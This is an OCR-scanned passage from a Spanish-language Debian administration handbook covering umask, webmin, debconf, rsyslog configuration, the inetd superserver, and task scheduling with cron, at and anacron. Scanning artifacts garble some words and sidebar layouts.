YENDO  MAS  ALLA  Cuando  una  aplicacion  crea  un  archivo  asigna  permisos  indicativos,  sabiendo  que  el 
umask  sistema  automaticamente  elimina  algunos  permisos,  dados  por  el  programa  umask. 

Ejecuta  umask  en  una  consola;  vera  una  mascara  como  0022.  Esta  es  simplemente 
una  representacion  octal  de  los  permisos  que  seran  eliminados  sitematicamente 
(en  este  caso,  el  permiso  de  escritura  para  el  grupo  y  otros  usuarios). 

Si  provee  un  nuevo  valor  octal,  el  programa  umask  modificara  la  mascara.  Si  lo 
utiliza  en  un  script  de  inicializacion  de  consola  (por  ejemplo  -/ .  bash  prof  ile) 
efectivamente  cambiara  la  mascara  predeterminada  en  sus  sesiones  de  trabajo. 


9.4.  Interfaces  de  administracion 

Utilizar  una  interfaz  grafica  para  administracion  es  interesante  en  varias  circunstancias.  Un 
administrador  no  conoce,  necesariamente,  todos  los  detalles  de  la  configuracion  de  todos  los 
servicios,  y  no  siempre  tendra  tiempo  de  revisar  la  documentacion  correspondiente.  Una  inter¬ 
faz  grafica  para  administracion  puede,  entonces,  acelerar  el  despliegue  de  un  nuevo  servicio. 
Tambien  puede  simplificar  la  instalacion  de  servicios  que  son  dificiles  de  configurar. 

Estas  interfaces  son  solo  ayudas  y  no  un  fin  en  si  mismo.  En  todos  los  casos  el  administrador 
debe  dominar  su  comportamiento  para  entender  y  evitar  cualquier  problema  potencial. 

Debido  a  que  ninguna  interfaz  es  perfecta,  puede  estar  tentado  de  probar  varias  soluciones.  Debe 
evitar  esto  tanto  como  sea  posible  ya  que,  a  veces,  el  metodo  funcionamiento  de  las  diferentes 
herramientas  es  incompatible.  Aunque  todas  intentan  ser  muy  flexibles  e  intentan  adoptar  el 
archivo  de  configuracion  como  unica  referencia,  no  siempre  pueden  integrar  cambios  externos. 


9.4.1  Administracion  en  una  interfaz  web:  webmin 

Esta  es,  sin  lugar  a  dudas,  una  de  las  interfaces  de  administracion  mas  existosas.  Es  un  sistema 
modular  administrador  a  traves  de  un  servidor  web,  que  incluye  un  amplio  rango  de  areas  y 
herramientas.  Lo  que  es  mas,  esta  internacionalizada  y  esta  diponible  en  muchos  idiomas. 

Lamentablemente  webmin  ya  no  es  parte  de  Debian.  Su  encargado  en  Debian  —  Jaldhar  H.  Vyas 
—  elimino  los  paquetes  que  creo  porque  ya  no  tenia  el  tiempo  necesario  para  mantenerlos  en 
un  nivel  de  calidad  aceptable.  Nadie  asumio  ese  trabajo  oficialmente,  por  lo  que  Jessie  no  tiene 
el  paquete  webmin. 

Existe,  sin  embargo,  un  paquete  no  oficial  distribuido  en  el  sitio  web  webmin.com.  A  diferencia 
de  los  paquetes  Debian  originales,  este  paquete  es  monolitico;  de  forma  predeterminada  se  ins- 
talan  y  activan  todos  sus  modulos  de  configuracion,  aun  si  el  servicio  correspondiente  no  esta 
instalado  en  el  equipo. 
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SEGURIDAD  Durante  el  primer  inicio  de  sesion  debe  identificarse  con  el  usuario  root  y  su  contra- 
Modificacion  de  la  seha  habitual.  Es  recomendable  cambiar  la  contrasena  que  utiliza  para  webmin  tan 
contrasena  de  root  pronto  como  sea  posible,  de  forma  que  aunque  esta  pueda  ser  comprometida,  y  a 
pesar  de  que  el  propio  webmin  proporciona  permisos  administrativos  importantes 
en  el  equipo,  no  se  consiga  a  la  vez  la  contrasena  de  root  del  servidor. 

jCuidado!  Dado  que  webmin  posee  tanta  funcionalidad,  un  usuario  malicioso  que 
acceda  a  el  puede  comprometer  la  seguridad  de  todo  el  sistema.  En  general,  no  se 
recomiendan  este  tipo  de  interfaces  para  sistemas  importantes  con  fuertes  limita- 
ciones  de  seguridad  (firewall,  servidores  sensibles,  etc.). 


Webmin  se  utiliza  a  traves  de  una  interfaz  web,  pero  no  necesita  instalar  Apache.  Esencialmen- 
te,  este  software  tiene  su  propio  miniservidor  web  integrado.  De  forma  predeterminada,  este 
servidor  escucha  en  el  puerto  10000  y  acepta  conexiones  HTTP  seguras. 

Los  modulos  incluidos  cubren  una  amplia  variedad  de  servicios,  entre  ellos: 

■  todos  los  servicios  base:  creacion  de  usuarios  y  grupos,  administracion  de  archivos 
crontab,  scripts  de  inicio,  visualizacion  de  registros,  etc. 

■  bind:  configuracion  del  servidor  DNS  (servicio  de  nombres); 

■  postfix:  configuracion  del  servidor  SMTP  (correo  electronico); 

■  inetd:  configuracion  del  superservidor  inetd; 

■  quota:  administracion  de  cuotas  de  usuario; 

■  dhcpd:  configuracion  del  servidor  DHCP; 

■  prpftpd:  configuracion  del  servidor  FTP; 

■  samba:  configuracion  del  servidor  de  archivos  Samba; 

■  software:  instalacion  o  eliminacion  de  software  desde  paquetes  Debian  y  actualizaciones 
de  sistema. 

La  interfaz  de  administracion  esta  disponible  a  traves  de  un  navegador  en  https://localhost:1 0000. 
jCuidado!  No  podra  utilizar  directamente  todos  los  modulos.  Debera  configurar  algunos  especi- 
ficando  la  ubicacion  de  los  archivos  de  configuracion  correspondiente  y  algunos  archivos  eje- 
cutables  (programas).  Frecuentemente  el  sistema  le  pedira  esa  informacion  cuando  no  pueda 
activar  un  modulo  que  solicite. 


ALTERNATIVA  El  proyecto  GNOME  tambien  provee  varias  interfaces  de  administracion,  a  las  que 

Centro  de  control  de  generalmente  puede  acceder  a  traves  del  elemento  «Preferencias»  en  el  menu  del 

GNOME  («Control  usuario  en  la  esquina  superior  derecha.  gnome-control-center  es  el  programa 

Center»)  principal  que  las  unifica,  pero  muchas  de  las  herramientas  de  configuracion  del  sis¬ 

tema  en  general  son  provistas  efectivamente  por  otros  paquetes  ( accountsservice , 
system-config-printer,  etc.).  Aunque  son  faciles  de  utilizar,  solo  cubren  una  can- 
tidad  limitada  de  servicios  basicos:  gestion  de  usuarios,  configuracion  de  fecha  y 
hora,  configuracion  de  red,  configuracion  de  impresion,  etc.. 
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9.4.2  Configuration  de  paquetes:  debconf 


Despues  de  realizar  unas  pocas  preguntas  durante  la  instalacion  a  traves  de  Debconf,  muchos  pa¬ 
quetes  son  configurados  automaticamente.  Puede  reconfigurar  estos  paquetes  ejecutando  dpkg  - 
reconfigure  paquete. 

En  la  mayorfa  de  los  casos,  estas  configuraciones  son  muy  simples;  solo  modifican  unas  pocas 
variables  importantes  en  el  archivo  de  configuration.  Generalmente  se  agrupan  estas  variables 
entre  dos  lineas  de  «demarcacion»  para  que  la  reconfiguration  del  paquete  solo  afecte  el  area 
entre  ellas.  En  otros  casos,  la  reconfiguration  no  realizara  cambios  si  el  script  detecta  una  mo¬ 
dification  manual  del  archivo  de  configuration  para  preservar  estas  intervenciones  humanas 
(debido  a  que  el  script  no  puede  asegurar  que  sus  propias  modificaciones  no  afectaran  la  confi¬ 
guration  existente). 


NORMATIVA  DEBIAN  La  Normativa  Debian  estipula  expresamente  que  se  debe  hacer  todo  para  preser- 
Preservacion  de  cambios  var  'os  cambios  manuales  en  los  archivos  de  configuracion,  por  lo  que  mas  y  mas 

scripts  toman  precauciones  al  editar  archivos  de  configuracion.  El  principio  general 
es  simple:  el  script  solo  realizara  cambios  si  conoce  el  estado  del  archivo  de  configu¬ 
racion,  lo  que  controla  comparando  la  suma  de  verificacion  del  archivo  con  la  del 
ultimo  archivo  generado  automaticamente.  Si  son  iguales,  el  script  esta  autorizado 
a  realizar  cambios  en  el  archivo  de  configuracion.  De  lo  contrario,  determina  que  el 
archivo  fue  modificado  y  pregunta  por  la  accion  a  tomar  (instalar  el  nuevo  archivo, 
guardar  el  archivo  existente  o  intentar  integrar  los  nuevos  cambios  en  el  archivo 
actual).  Este  principio  de  precaucion  es,  desde  hace  tiempo,  exclusivo  de  Debian 
pero  otras  distribuciones  gradualmente  comenzaron  a  aceptarlo. 

Puede  utilizar  el  programa  ucf  (en  el  paquete  Debian  del  mismo  nombre)  para 
implementar  este  comportamiento. 


9.5.  syslog  Eventos  de  sistema 

9.5.1  Principio  y  mecanismo 

El  demonio  rsyslogd  es  responsable  de  recolectar  los  mensajes  de  servicio  que  provienen  de 
aplicaciones  y  el  nucleo  para  luego  distribuirlos  en  archivos  de  registros  (usualmente  almacena- 
dos  en  el  directorio  /va  r/log/).  Obedece  a  su  archivo  de  configuracion:  /etc/  rsyslog  .  conf . 

Cada  mensaje  de  registro  es  asociado  con  un  subsistema  de  aplicaciones  (llamados  «facility»  en 
la  documentation): 

■  auth  y  authpriv:  para  autenticacion; 

■  cron:  proviene  servicios  de  programacion  de  tareas,  c  ron  y  atd; 

■  daemon:  afecta  un  demonio  sin  clasificacion  especial  (DNS,  NTP,  etc.); 

■  ftp:  el  servidor  FTP; 

■  kern:  mensaje  que  proviene  del  nucleo; 

■  Ipr:  proviene  del  subsistema  de  impresion; 
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■  mail:  proviene  del  subsistema  de  correo  electronico; 

■  news:  mensaje  del  subsistema  Usenet  (especialmente  de  un  servidor  NNTP  —  protocolo 
de  transferencia  de  noticias  en  red,  «Network  News  Transfer  Protocol))  —  que  administra 
grupos  de  noticias); 

■  syslog:  mensajes  del  servidor  syslogd  en  si; 

■  user:  mensajes  de  usuario  (genericos); 

■  uucp:  mensajes  del  servidor  UUCP  (programa  de  copia  Unix  a  Unix,  «Unix  to  Unix  Copy 
Program)),  un  protocolo  antiguo  utilizado  notablemente  para  distribuir  correo  electroni¬ 
co); 

■  localO  a  local7:  reservados  para  uso  local. 

Cada  mensaje  tiene  asociado  tambien  un  nivel  de  prioridad.  Aqui  esta  la  lista  en  orden  decre- 
ciente: 

■  emerg:  «jAyuda!»  Hay  una  emergencia  y  el  sistema  probablemente  esta  inutilizado. 

■  alerta:  apurese,  cualquier  demora  puede  ser  peligrosa,  debe  reaccionar  inmediatamente; 

■  crit:  las  condiciones  son  criticas; 

■  err:  error; 

■  warn:  advertencia  (error  potencial); 

■  notice:  las  condiciones  son  normales  pero  el  mensaje  es  importante; 

■  info:  mensaje  informativo; 

■  debug:  mensaje  de  depuracion. 


9.5.2  El  archivo  de  configuracion 

La  sintaxis  del  archivo  /etc/ rsyslog .  conf  esta  detallada  en  la  pagina  de  manual  rsyslog. 
conf  (5),  pero  tambien  hay  disponible  documentacion  HTML  en  el  paquete  rsyslog-doc  (/usr/ 
share/doc/  rsyslog  -  doc/html/index .  html).  El  principio  general  es  escribir  pares  de  «selec- 
tor»  y  «acci6n».  El  selector  define  los  mensajes  relevantes  y  la  accion  describe  que  hacer  con 
ellos. 


Sintaxis  del  selector 

El  selector  es  una  lista  separada  por  punto  y  coma  de  pares  subsistema.prioridad  (por  ejemplo: 
auth.notice;mail.info).  Un  asterisco  puede  representar  todos  los  subsistemas  o  todas  las  priorida- 
des  (por  ejemplo:  *.alert  o  mail.*).  Puede  agrupar  varios  subsistemas  separandolos  con  una  coma 
(por  ejemplo:  auth, mail. info).  La  prioridad  indicada  tambien  incluye  los  mensajes  de  prioridad 
igual  o  mayor;  por  lo  tanto,  auth. alert  indica  los  mensajes  del  subsistema  auth  de  prioridad  alert 
o  emerg.  Si  se  agrega  un  signo  de  exclamacion  (!)  como  prefijo,  indica  lo  contrario;  en  otras  pala- 
bras,  prioridades  estrictamente  menores.  Por  lo  tanto,  auth.lnotice  solo  incluye  los  mensajes  del 


Capltulo  9  —  Servicios  Unix 


215 


subsistema  auth  con  prioridades  info  o  debug.  Si  se  agregaun  signo  igual  (=)  como  prefijo  corres- 
ponde  unicay  exactamente  con  la  prioridad  indicada  (auth.=notice  solo  incluye  los  mensajes  del 
subsistema  auth  con  prioridad  notice). 

Cada  elemento  en  la  lista  del  selector  reemplaza  elementos  anteriores.  Asi  es  posible  restringir 
un  conjunto  o  excluir  ciertos  elementos  del  mismo.  Por  ejemplo,  kern.info;kern.!err  significa  los 
mensajes  del  nucleo  con  prioridades  entre  info  y  warn.  La  prioridad  none  indica  el  conjunto 
vacio  (ninguna  prioridad)  y  puede  servir  para  excluir  un  subsistema  de  un  conjunto  de  mensajes. 
Por  lo  tanto  *.crit;kem.none  indica  todos  los  mensajes  con  prioridad  igual  o  mayor  a  crit  que  no 
provengan  del  nucleo. 


Sintaxis  de  las  acciones 


VOLVER  A  LOS  CIMIENTOS 

La  tuberia  («pipe»)  con 
nombre,  una  tuberia 
persistente 


Una  tuberia  con  nombre  es  un  tipo  particular  de  archivo  que  funciona  como  una 
tuberia  tradicional  (la  tuberia  que  crea  con  el  simbolo  «|»  en  una  consola),  pero  a 
traves  de  un  archivo.  Este  mecanismo  tiene  la  ventaja  de  poder  relacionar  dos  pro- 
cesos  que  no  estan  relacionados.  Todo  lo  que  se  escriba  en  una  tuberia  con  nombre 
bloquea  el  proceso  que  escribe  hasta  que  un  proceso  intente  leer  los  datos  escri- 
tos.  Este  segundo  proceso  lee  los  datos  escritos  por  el  primero,  que  puede  luego 
continuar  ejecutando. 


Puede  crear  estos  archivos  con  el  programa  mkf  if  o. 


Las  acciones  posibles  son: 

■  agregar  el  mensaje  aun  archivo  (ejemplo:  /var/log/messages); 

■  enviar  el  mensaje  a  un  servidor  syslog  remoto  (ejemplo:  @log.falcot.com); 

■  enviar  el  mensaje  a  una  tuberia  con  nombre  existente  (ejemplo:  |/dev/xconsole); 

■  enviar  el  mensaje  a  uno  o  mas  usuarios  si  tienen  una  sesion  iniciada  (ejemplo:  root.rhert 
zog); 

■  enviar  el  mensaje  a  todos  los  usuarios  con  sesiones  activas  (ejemplo:  *); 

■  escribir  el  mensaje  en  una  consola  de  texto  (ejemplo:  /dev/tty8). 


SEGURIDAD  Es  buena  idea  grabar  los  registros  mas  importantes  en  una  maquina  separada  (tal 
Reenvio  de  registros  vez  dedicada  a  este  proposito),  ya  que  evitara  que  cualquier  intruso  elimine  los 
rastros  de  su  intromision  (a  menos,  por  supuesto,  que  tambien  comprometa  este 
otro  servidor).  Lo  que  es  mas,  en  el  caso  de  un  problema  mayor  (como  un  fallo 
abrupto  del  nucleo)  tendra  disponible  los  registros  en  otro  equipo,  lo  que  aumenta 
sus  probabilidades  de  determinar  la  secuencia  de  eventos  que  llevo  al  fallo. 

Para  aceptar  mensajes  de  registro  enviados  por  otras  maquinas  debe  reconfigurar 
rsyslog:  en  la  practica  es  suficiente  activar  las  lineas  ya  preparadas  en  el  archivo 
/etc/rsyslog .  conf  ($ModLoad  imudp  y  $UDPServerRun  514). 
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9.6.  El  superservidor  inetd 

Inetd  (frecuentemente  llamado  «superservidor  de  internet)))  es  un  servidor  de  servidores.  Eje- 
cuta  a  pedido  servidores  rara  vez  utilizados  para  que  no  tengan  que  ejecutar  continuamente. 

El  archivo  /et c/inetd  .  conf  enumera  estos  servidores y  sus  puertos usuales.  El  programa  inetd 
escucha  en  todos  estos  puertos  y  cuando  detecta  una  conexion  a  uno  de  ellos  ejecuta  el  programa 
servidor  correspondiente. 


NORMATIVA  DEBIAN  Frecuentemente  los  paquetes  desean  registrar  un  nuevo  servidor  en  el  archivo 

Registro  de  un  servidor  /etc/inetd  .  conf ,  pero  la  Normativa  Debian  prohibe  que  un  paquete  modifique 

en  inetd  conf  un  alxhivo  de  configuracion  que  no  le  pertenece.  Es  por  esto  que  se  creo  el  script 
updated -inetd  (en  el  paquete  del  mismo  nombre):  este  script  administra  el  ar¬ 
chivo  de  configuracion  y  otros  paquetes  pueden  utilizarlo  para  registrar  un  nuevo 
servidor  en  la  configuracion  del  superservidor. 


Cada  linea  significativa  del  archivo  /etc/inetd .  conf  describe  un  servidor  con  siete  campos 
(separados  con  espacios): 

■  El  numero  de  puerto  TCP  o  UDP  o  el  nombre  del  servicio  (asociado  con  un  numero  de 
puerto  estandar  con  la  informacion  en  el  archivo  /etc/services). 

■  El  tipo  de  zocalo:  stream  para  una  conexion  TCP,  dgram  para  datagramas  UDP. 

■  El  protocolo:  tcp  o  udp. 

■  Las  opciones:  dos  valores  posibles,  wait  o  nowait  para  indicarle  a  inetd  si  debe  esperar 
o  no  a  que  el  proceso  ejecutado  finalice  antes  de  aceptar  una  nueva  conexion.  Para  co- 
nexiones  TCP,  faciles  de  gestionar  simultaneamente,  utilizara  generalmente  nowait.  Para 
programas  que  respondan  sobre  UDP  deberia  utilizar  nowait  solo  si  el  servidor  es  capaz 
de  gestionar  varias  conexiones  en  paralelo.  Puede  agregar  un  punto  al  final  de  este  campo 
seguido  de  la  cantidad  maxima  de  conexiones  autorizadas  por  minuto  (el  limite  predeter- 
minado  es  256). 

■  El  nombre  del  usuario  bajo  el  que  ejecutara  el  servidor. 

■  La  ruta  completa  al  programa  del  servidor  a  ejecutar. 

■  Los  parametros:  esta  es  una  lista  completa  de  los  parametros  del  programa,  incluyendo  su 
propio  nombre  (argv[0]  en  C). 

El  ejemplo  a  continuacion  ilustra  los  casos  mas  comunes: 

Ejemplo  9.1  Extracto  de  /etc/inetd .  conf 

talk  dgram  udp  wait  nobody. tty  /usr/sbin/in . talkd  in.talkd 

finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd 

ident  stream  tcp  nowait  nobody  /usr/sbin/identd  identd  -i 
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Frecuentemente  se  utiliza  el  programa  tcpd  en  el  archivo  /etc/inetd .  conf .  Permite  limitar 
las  conexiones  entrantes  aplicando  reglas  de  control  de  acceso,  documentadas  en  la  pagina  de 
manual  hosts_access(5),y  que  puede  configurar  en  los  archivos  /etc/hosts  .  allow y  /etc/ 
hosts .  deny.  Una  vez  que  se  determino  que  la  conexion  esta  autorizada,  t  cpd  ejecuta  el  servidor 
real  (en  el  ejemplo:  in .  tinge rd).  Vale  la  pena  aclarar  que  tcpd  necesita  el  nombre  con  el  que 
se  lo  invoca  (que  es  el  primer  parametro:  argv[0])  para  identificar  el  programa  real  a  ejecutar. 
No  deberfa  iniciar  la  lista  de  parametros  con  tcpd  sino  con  el  programa  subyacente. 


COMUNIDAD  Wietse  Venema,  programador  reconocido  por  su  experiencia  sobre  seguridad,  es  el 
Wietse  Venema  autor  del  programa  tcpd.  Tambien  es  el  creador  principal  de  Postfix,  el  servidor  de 
correo  modular  (SMTP,  protocolo  simple  de  transferencia  de  correo:  «Simple  Mail 
Transfer  Protocol*),  disenado  para  ser  mas  seguro  y  confiable  que  sendmail  que 
tiene  una  larga  historia  de  vulnerabilidades  de  seguridad. 


ALTERNATIVA  Si  bien  Debian  instala  openbsd-inetd  de  forma  predeterminada,  no  faltan  alterna- 
Otros  programas  inetd  tivas:  podemos  mencionar  inetutiis-inetd,  micro-inetd,  rlinetd  y  xinetd. 

Esta  ultima  encamacion  de  superservidor  ofrece  posibilidades  muy  interesantes. 
Notablemente,  se  puede  dividir  su  configuracion  en  varios  archivos  (almacenados, 
por  supuesto,  en  el  directorio  /etc/xinetd .  d/),  lo  que  puede  hacer  mas  sencilla 
la  vida  del  administrador. 

Por  ultimo,  pero  no  menos  importante,  es  posible  emular  el  comportamiento  de 
inetd  con  el  mecanismo  de  activacion  de  zocalos  de  systemd  (ver  Seccion  9.1.1, 
«EI  sistema  de  inicio  systemd*  pagina  195). 


9.7.  Programacion  de  tareas  con  cron  y  atd 

cron  es  el  demonio  responsable  de  ejecutar  tareas  programadas  y  recurrentes  (todos  los  dfas, 
todas  las  semanas,  etc.);  atd  esta  encargado  de  los  programas  a  ejecutar  una  sola  vez  pero  en  un 
momento  especffico  en  el  futuro. 

En  un  sistema  Unix,  muchas  tareas  estan  programadas  para  ejecutarse  regularmente: 

■  rotar  los  archivos  de  registro; 

■  actualizar  la  base  de  datos  del  programa  locate; 

■  respaldos; 

■  scripts  de  mantenimiento  (como  limpiar  los  archivos  temporales). 

De  forma  predeterminada,  todos  los  usuarios  pueden  programar  tareas  para  ejecutar.  Cada  usua- 
rio  tiene  su  propio  «crontab»  en  el  que  pueden  almacenarlas.  Puede  editarlo  ejecutando  crontab 
-e  (el  contenido  del  mismo  es  almacenado  en  el  archivo  /va  r/spool/cron/crontabs/usuario). 
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SECURIDAD  Puede  restringir  el  acceso  a  cron  si  crea  un  archivo  de  autorizacion  explicita  (una 
Restriction  de  cron  o  atd  blanca)  en  /etc/cron  .  allow  donde  indique  solo  los  usuarios  autorizados  a 

programar  tareas.  Todos  los  demas  usuarios  automaticamente  quedaran  excluidos 
de  dicha  funcionalidad.  A  la  inversa,  si  solo  desea  bloquear  unos  pocos  usuarios 
problematicos,  podria  agregar  su  nombres  de  usuario  en  el  archivo  de  prohibicion 
explicita  /etc/cron  .  deny.  Esta  misma  funcionalidad  esta  disponible  para  atd  con 
los  archivos  /etc/at .  allow  y  /etc/at .  deny. 


El  usuario  root  tiene  su  propio  «crontab»,  pero  tambien  puede  utilizar  el  archivo  /etc/c  rontab 
o  escribir  archivos  «crontab»  adicionales  en  el  directorio  /etc/cron  .d.  Estas  dos  ultimas  solu- 
ciones  tienen  la  ventaja  de  poder  especificar  el  usuario  bajo  el  que  se  ejecutara  el  programa. 

De  forma  predeterminada,  el  paquete  cron  incluye  algunas  tareas  programadas  que  ejecutan: 

■  programas  en  el  directorio  /etc/cron  .hourly/  una  vez  por  hora; 

■  programas  en  el  directorio  /etc/cron  .daily/  una  vez  por  dia; 

■  programas  en  el  directorio  /etc/cron  .weekly/  una  vez  por  semana; 

■  programas  en  el  directorio  /etc/cron  .monthly/  una  vez  por  mes. 

Muchos  paquetes  Debian  dependen  de  este  servicio:  agregan  sus  scripts  de  mantenimiento  en 
estos  directories,  los  cuales  garantizan  un  funcionamiento  optimo  de  sus  servicios. 


9.7.1  Formato  de  un  archivo  crontab 


CASO  ESPECIAL  En  Debian,  cron  tiene  en  cuenta  los  cambios  de  hora  (para  horarios  de  verano  o, 

cron  y  horarios  de  verano  de  hecho,  cualquier  cambio  importante  en  la  hora  local)  de  la  mejor  forma  que  le 

es  posible.  Por  lo  tanto,  las  tareas  que  deben  ejecutarse  durante  una  hora  que  nun- 
ca  existio  (por  ejemplo:  aquellas  programadas  para  las  02:30  durante  el  cambio  de 
horario  de  verano  en  Francia,  ya  que  el  reloj  salta  de  las  02:00  a  las  03:00  directa- 
mente)  se  ejecutaran  poco  despues  del  cambio  de  hora  (por  lo  tanto,  alrededor  de 
las  03:00  DST).  Por  otro  lado,  en  otono,  las  tareas  seran  ejecutadas  solo  una  vez 
cuando  podrian  ser  ejecutadas  varias  veces  (a  las  02:30  DST  y  luego  a  las  02:30  en 
horario  estandar  ya  que  a  las  03:00  DST  el  reloj  vuelve  a  las  02:00). 

Tenga  cuidado,  sin  embargo,  si  el  orden  y  el  tiempo  entre  ejecuciones  de  tareas 
programadas  importa.  Debe  revisar  la  compatibilidad  de  estas  limitaciones  con  el 
comportamiento  de  cron;  si  es  necesario,  puede  preparar  una  programacion  espe¬ 
cial  para  las  dos  noches  problematicas  del  ano. 
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SUGERENCIA  cron  reconoce  algunas  abreviaciones  que  reemplazan  los  primeros  cinco  campos 
Atajos  de  texto  para  cron  de  un  elemento  de  crontab.  Corresponden  a  las  opciones  de  programacion  mas 

comunes: 

■  @yearly:  una  vez  por  ano  (1  de  Enero  a  las  00:00); 

■  @monthly:  una  vez  por  mes  (el  Iro  de  mes  a  las  00:00); 

■  (aweekly:  una  vez  por  semana  (Domingo  a  las  00:00); 

■  (adaily:  una  vez  por  dia  (a  las  00:00); 

■  (ahourly:  una  vez  por  hora  (al  principio  de  cada  hora). 


Cada  lfnea  significativa  de  un  archivo  crontab  describe  una  tarea  programada  con  los  siguientes 
seis  (o  siete)  campos: 

■  el  valor  del  minuto  (numero  de  0  a  59); 

■  el  valor  de  la  hora  (de  0  a  23); 

■  el  valor  del  dia  del  mes  (de  1  a  31); 

■  el  valor  del  mes  (de  1  a  12); 

■  el  valor  de  los  dias  de  la  semana  (de  0  a  7,  donde  1  es  el  lunes  y  el  domingo  es  tanto  el  0 
como  el  7;  tambien  es  posible  utilizar  las  tres  primeras  letras  del  nombre  del  dfa  en  ingles, 
como  Sun,  Mon,  etc.); 

■  el  nombre  de  usuario  bajo  el  que  se  ejecutara  el  programa  (en  el  archivo  /etc/crontab  y 
en  los  fragmentos  ubicados  en  /etc/cron  .d/,  pero  no  en  los  archivos  de  cada  usuario); 

■  el  programa  a  ejecutar  (cuando  se  cumpla  la  condicion  definida  por  los  primeros  cinco 
campos). 

Todos  estos  detalles  estan  documentados  en  la  pagina  de  manual  c  rontab  ( 5 ) . 

Puede  expresar  cada  valor  como  una  lista  de  valores  posibles  (separados  por  coma).  La  sintaxis 
a-b  describe  el  intervalo  de  todos  los  valores  entre  a  y  b.  La  sintaxis  a-b/c  describe  el  intervalo 
con  un  incremento  de  c  (por  ejemplo:  0-10/2  es  lo  mismo  que  0,2,4,6,8,10.  Un  asterisco  «*»  es  un 
comodin  y  representa  todos  los  valores  posibles. 

Ejemplo  9.2  Ejemplo  de  archivo  crontab 


#Formato 

#min  hora  dia  mes  dds  programa 

#  Descargar  los  datos  todas  las  noches  a  las  19:25 

25  19  *  *  *  $H0ME/bin/descargar. pi 

#  08:00  en  dias  de  semana  (Lunes  a  Viernes) 

00  08  *  *  1-5  $H0ME/bin/haceralgo 

#  Reiniciar  el  proxy  IRC  luego  de  cada  reinicio 
(areboot  /usr/bin/dircproxy 
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SUGERENCIA 

Ejecucion  de  un 
programa  durante  el 
inicio 


Para  ejecutar  un  programa  solo  una  vez,  justo  despues  de  iniciar  el  equipo,  puede 
utilizar  el  macro  (areboot  (reiniciar  cron  no  disparara  aquello  programado  con  @ 
reboot).  Este  macro  reemplaza  los  primeros  cinco  campos  de  un  elemento  en  el 
archivo  «crontab». 


ALTERNATIVA  Es  posible  emular  parte  del  comportamiento  de  cron  mediante  el  mecanismo  de 
Emulacion  de  cron  temporizadores  de  systemd  (ver  Seccion  9.1.1,  «EI  sistema  de  inicio  systemd»  pa- 

mediante  systemd  §'na 


9.7.2  Utilizacion  del  programa  at 

La  orden  at  ejecuta  un  programa  en  un  momento  especifico  en  el  futuro.  Obtiene  la  fechay  hora 
deseada  como  parametros  y  el  programa  a  ejecutar  en  su  entrada  estandar.  Ejecutara  el  progra¬ 
ma  como  si  hubiese  sido  ingresado  en  la  consola  actual,  at  incluso  se  encarga  de  mantener  el 
entorno  para  poder  reproducir  las  mismas  condiciones  al  ejecutar  el  programa.  Puede  indicar 
la  hora  con  las  convenciones  usuales:  16:12  o  4:12pm  representan  12  minutos  pasadas  las  4  de  la 
tarde.  Tambien  puede  especificar  la  fecha  en  varios  formatos  europeos  u  occidentales,  incluyen- 
do  DD.MM.AA  (27.07.15  representaria  el  27  de  Julio  de  2015),  AAAA-MM-DD  (la  misma  fecha 
se  representaria  como  2015-07-27),  MM/DD/[CC]AA  (es  decir:  12/25/15  o  12/25/2015  represen¬ 
tan,  ambas,  el  25  de  Diciembre  de  2015)  o  simplemente  MMDDCCAA  (de  forma  que  122515  o 
12252015  tambien  representaria  el  25  de  Diciembre  de  2015).  Sin  fecha,  ejecutara  el  programa 
tan  pronto  como  el  reloj  indique  la  hora  especificada  (el  mismo  dia  o  el  siguiente  si  ya  paso  di- 
cha  hora  ese  dia).  Tambien  puede  ingresar  simplemente  «today»  o  «tomorrow»  representando 
el  dia  actual  o  el  dia  siguiente,  respectivamente. 

$  at  09:00  27.07.15  «END 

>  echo  "iNo  olvides  desearle  un  feliz  cumpleanos  a  Raphael!”  \ 

>  |  mail  lolando@debian.org 

>  END 

warning:  commands  will  be  executed  using  /bin/sh 
job  31  at  Mon  Jul  27  09:00:00  2015 

Una  sintaxis  alternativa  posterga  la  ejecucion  por  un  tiempo  determinado:  at  now  +  numero 
perlodo.  El  periodo  puede  ser  minutes  (minutos),  hours  (horas),  days  (dias)  o  weeks  (semanas). 
numero  simplemente  indica  la  cantidad  de  dichas  unidades  deben  pasar  antes  de  ejecutar  el  pro¬ 
grama. 

Para  cancelar  una  tarea  programada  con  cron,  simplemente  ejecute  crontab  -e  y  elimine  la 
linea  correspondiente  del  archivo  crontab.  Para  tareas  en  at  es  casi  igual  de  sencillo:  ejecute  at  rm 
numero-tarea.  El  numero  de  tarea  es  indicado  por  at  cuando  la  programo,  pero  puede  volver  a 
encontrarla  ejecutando  atq  que  le  proveera  una  lista  de  las  tareas  programadas  actualmente. 
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9.8.  Programacion  de  tareas  asincronicas:  anacron 


ana  cron  es  el  demonio  que  completa  cron  en  equipos  que  no  estan  encendidos  todo  el  tiempo. 
Dado  que  generalmente  las  tareas  recurrentes  estan  programadas  para  la  mitad  de  la  noche,  no 
ejecutaran  nunca  si  la  maquina  esta  apagada  en  esos  momentos.  El  proposito  de  anacron  es  eje- 
cutarlas  teniendo  en  cuenta  los  perfodos  de  tiempo  en  los  que  el  equipo  no  estuvo  funcionando. 

Sepa  que  anac  ron  frecuentemente  ejecutara  dichos  programas  unos  minutos  despues  de  iniciar 
la  maquina,  lo  que  utilizara  poder  de  procesamiento  del  equipo.  Es  por  esto  que  se  ejecutan 
las  tareas  en  el  archivo  /etc/anacrontab  con  el  programa  nice  que  reduce  su  prioridad  de 
ejecucion,  limitando  asi  su  impacto  en  el  resto  del  sistema.  Tenga  en  cuenta  que  el  formato 
de  este  archivo  no  es  el  mismo  que  el  de  /etc/c rontab;  si  tiene  necesidades  especiales  para 
anacron  revise  la  pagina  de  manual  anacrontab(5). 


VOLVER  A  LOS  CIMIENTOS  Los  sistemas  Unix  (y,  por  lo  tanto,  Linux)  son  sistemas  multitarea  y  multiusuario. 

Prioridades  y  nide  Varios  procesos  puede  ejecutar  en  paralelo  y  pertenecer  a  diferentes  usuarios:  el  nu- 

cleo  mediara  el  acceso  a  los  recursos  para  los  diferentes  procesos.  Como  parte  de 
esta  tarea  tiene  el  concepto  de  prioridad,  que  permite  favorecer  a  ciertos  procesos 
por  sobre  otros  segun  sea  necesario.  Cuando  sabe  que  un  proceso  puede  ejecutar 
con  prioridad  baja,  puede  indicarlo  ejecutandolo  con  nice  programa.  El  programa 
entonces  tendra  una  porcion  mas  pequena  del  CPU  y  tendra  un  menor  impacto 
